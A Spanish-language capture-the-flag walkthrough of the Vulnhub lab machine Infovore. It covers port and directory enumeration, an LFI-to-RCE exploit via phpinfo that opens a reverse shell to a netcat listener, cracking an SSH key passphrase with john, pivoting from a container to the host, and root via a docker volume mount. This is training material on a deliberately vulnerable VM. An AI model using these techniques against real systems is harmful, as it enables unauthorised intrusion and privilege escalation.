[VLN] Infovore

Hoy vamos a hackear la maquina de Vulnhub llamada Infovore. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/infovore-1,496/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.27 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 22:24 CEST Nmap scan report for infovore.home (192.168.1.27) Host is up (0.00039s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Include me ... Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

Vemos que solo tiene el puerto 80 abierto, asi que lo investigamos un poco mas.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.27 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.27 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php,html [+] Timeout: 10s =============================================================== 2020/06/28 22:28:06 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /.htaccess.html (Status: 403) /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.txt (Status: 403) /css (Status: 301) /img (Status: 301) /index.php (Status: 200) /index.html (Status: 200) /info.php (Status: 200) /server-status (Status: 403) /vendor (Status: 301) =============================================================== 2020/06/28 22:28:29 Finished ===============================================================

Entre otras cosas, encontramos el fichero info.php que nos muestra la tipica salida de phpinfo(), y por otro lado el fichero index.php Vamos a ver si index.php acepta algun parametro...

sml@Cassandra:~/tools/parameth$ python parameth.py -u http://192.168.1.27/index.php | | __ \ _` | __| _` | __ `__ \ _ \ __| __ \ | | ( | | ( | | | | __/ | | | | .__/ \__,_|_| \__,_|_| _| _|\___|\__|_| |_| _| parameth v1.337 - find parameters and craic rocks Author: Ciaran McNally - https://securit.ie/ ================================================ Establishing base figures... POST data: Offset value: 0 GET: content-length-> 4743 status-> 200 POST: content-length-> 4743 status-> 200 Scanning it like you own it... GET(size): filename | 4743 ->80 ( http://192.168.1.27/index.php?filename=discobiscuits )

Vemos que acepta el parametro "filename". Tras probar, poco podemos hacer con el LFI por si solo, sin embargo hay un exploit[1] que puede servirnos, ya que reunimos todos los requisitos! :)

sml@Cassandra:~/$ mkdir infovore sml@Cassandra:~/$ cd infovore sml@Cassandra:~/infovore$ wget https://github.com/M4LV0/LFI-phpinfo-RCE/blob/master/exploit.py

En el exploit debemos modificar, la IP, el Puerto y modificar la variable REQ1 y LFIREQ para poner nuestro info.php y nuestro parametro filename:

REQ1="""POST /info.php?a="""..... LFIREQ="""GET /index.php?filename=%s...

Ponemos nc a la escucha.

sml@Cassandra:~$ nc -nlvp 3333 listening on [any] 3333 ...

Y ejecutamos el exploit.

sml@Cassandra:~/tools$ python exploit.py 192.168.1.27 80 20

Low Shell

sml@Cassandra:~$ nc -nlvp 3333 listening on [any] 3333 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.27] 35313 Linux e71b67461f6c 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) x86_64 GNU/Linux 00:05:36 up 1:42, 0 users, load average: 1.47, 4.48, 2.44 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash -i www-data@e71b67461f6c:/var/www/html$

Ahora que estamos dentro exploramos un poco mas el sistema.

www-data@e71b67461f6c:/tmp$ cat /proc/1/cgroup ---SNIP--- 8:perf_event:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d57 5c0a7 7:blkio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7 6:net_cls,net_prio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c 098d575c0a7 5:freezer:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0 a7 4:devices:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0 a7 ---SNIP---

Vemos que estamos dentro de un container :(

.user.txt

www-data@e71b67461f6c:/var/www/html$ ls -la total 312 drwxrwxrwx 6 www-data www-data 4096 Jun 22 22:39 . drwxr-xr-x 5 root root 4096 Jun 22 22:39 .. -r--r--r-- 1 root root 42 Jun 22 21:40 .user.txt drwxr-xr-x 2 root root 4096 Apr 27 10:55 css -rw-r--r-- 1 root root 2544 Sep 16 2019 gulpfile.js drwxr-xr-x 2 root root 4096 Apr 27 10:55 img -rw-r--r-- 1 root root 4674 Sep 16 2019 index.html -rw-r--r-- 1 root root 416 Jun 1 12:18 index.php -rw-r--r-- 1 root root 19 Apr 26 14:23 info.php -rw-r--r-- 1 root root 262191 Sep 16 2019 package-lock.json -rw-r--r-- 1 root root 1319 Sep 16 2019 package.json drwxr-xr-x 2 root root 4096 Apr 27 10:55 scss drwxr-xr-x 4 root root 4096 Sep 16 2019 vendor www-data@e71b67461f6c:/var/www/html$ cat .user.txt FLAG{Now_You_See_phpinfo_not_so_harmless}

Hemos encontrado una flag, seguimos rebuscando por el sistema... En / encontramos un fichero llamado .oldkeys.gz Lo descomprimimos.

www-data@e71b67461f6c:/$ cp .oldkeys.tgz /tmp www-data@e71b67461f6c:/$ cd /tmp www-data@e71b67461f6c:/tmp$ tar -xzvf .oldkeys.tgz root root.pub

Vemos que tiene una key publica y otra privada. Copiamos la key privada a nuestra maquina para ver si podemos crackear el password.

sml@Cassandra:~/.ssh$ /usr/share/john/ssh2john.py root > root.hash sml@Cassandra:~/.ssh$ sudo /usr/sbin/john root.hash --wordlist=/home/sml/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status choclate93 (root) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:04 DONE (2020-06-29 09:45) 0.2457g/s 3523Kp/s 3523Kc/s 3523KC/sa6_123..*7Â¡Vamos! Session completed

Bien, tenemos el password, choclate93. Hacemos "su" para ver si nos sirve la password para root.

www-data@e71b67461f6c:/$ su -P root Password: choclate93 root@e71b67461f6c:/# id uid=0(root) gid=0(root) groups=0(root)

Funciona :)

root.txt

root@e71b67461f6c:/tmp# cd /root root@e71b67461f6c:~# ls root.txt root@e71b67461f6c:~# cat root.txt FLAG{Congrats_on_owning_phpinfo_hope_you_enjoyed_it} And onwards and upwards!

En el directorio de root, vemos la carpeta .ssh que contiene 2 keys. En la key publica, aparece el usuario "admin" y una IP.

root@e71b67461f6c:~/.ssh# ls id_rsa id_rsa.pub known_hosts root@e71b67461f6c:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDN/keLDJowDdeSdHZz26wS1M2o2/eiJ99+acchRJr0lZE0Ymqb foIo+n75VS+eLiT03yonunkVp+lhK+uey7/Tu8JsQSHK1F0gci5FG7MKRU4/+m+0CODwVFTNgw3E4FKg 5qu+nt6BkBThU3Vnhe/Ujbp5ruNjb4pPajll2Pv5dyRfaRrn0DTnhpBdeXWdIhU9QQgtxzmUXed/77rV 6m4AL4+iENigp3YcPOjF7zUG/NEop9c1wdGpjSEhv/ftjyKoazFEmOI1SGpD3k9VZlIUFs/uw6kRVDJl g9uxT4Pz0tIEMVizlV4oZgcEyOJ9NkSe6ePUAHG7F+v7VjbYdbVh admin@192.168.150.1

Nos logueamos como admin en dicha IP.

root@e71b67461f6c:/# ssh admin@192.168.150.1 Enter passphrase for key '/root/.ssh/id_rsa': choclate93 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jun 23 05:59:43 2020 from 192.168.150.21 admin@infovore:~$

admin.txt

admin@infovore:~$ ls admin.txt admin@infovore:~$ cat admin.txt FLAG{Escaped_from_D0ck3r}

Vemos que el usuario admin pertenece al grupo docker. Miramos que imagenes tenemos.

admin@infovore:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE theart42/infovore latest 40de379c5116 6 days ago 428MB

Ahora solo nos queda montar la raiz del sistema /, en la carpeta del container /mnt/fuckfs, y ya que seremos root del container, podremos ver todo :)

root.txt

admin@infovore:~$ docker run -v /:/mnt/fuckfs -ti 40de379c5116 /bin/bash root@81abcd5978ad:/var/www/html# cd /mnt/fuckfs/root root@81abcd5978ad:/mnt/fuckfs/root# ls root.txt root@81abcd5978ad:/mnt/fuckfs/root# cat root.txt _____ _ _ / __ \ | | | | | / \/ ___ _ __ __ _ _ __ __ _| |_ ___| | | | / _ \| '_ \ / _` | '__/ _` | __/ __| | | \__/\ (_) | | | | (_| | | | (_| | |_\__ \_| \____/\___/|_| |_|\__, |_| \__,_|\__|___(_) __/ | |___/ __ __ _ _ __ _ \ \ / / | | (_) / _| | | \ V /___ _ _ _ ____ ___ __ ___ __| | _ _ __ | |_ _____ _____ _ __ ___| | \ // _ \| | | | | '_ \ \ /\ / / '_ \ / _ \/ _` | | | '_ \| _/ _ \ \ / / _ \| '__/ _ \ | | | (_) | |_| | | |_) \ V V /| | | | __/ (_| | | | | | | || (_) \ V / (_) | | | __/_| \_/\___/ \__,_| | .__/ \_/\_/ |_| |_|\___|\__,_| |_|_| |_|_| \___/ \_/ \___/|_| \___(_) | | |_| FLAG{And_now_You_are_done} @theart42 and @4nqr34z

End

Y con esto ya seriamos root de la maquina :) [1] https://github.com/M4LV0/LFI-phpinfo-RCE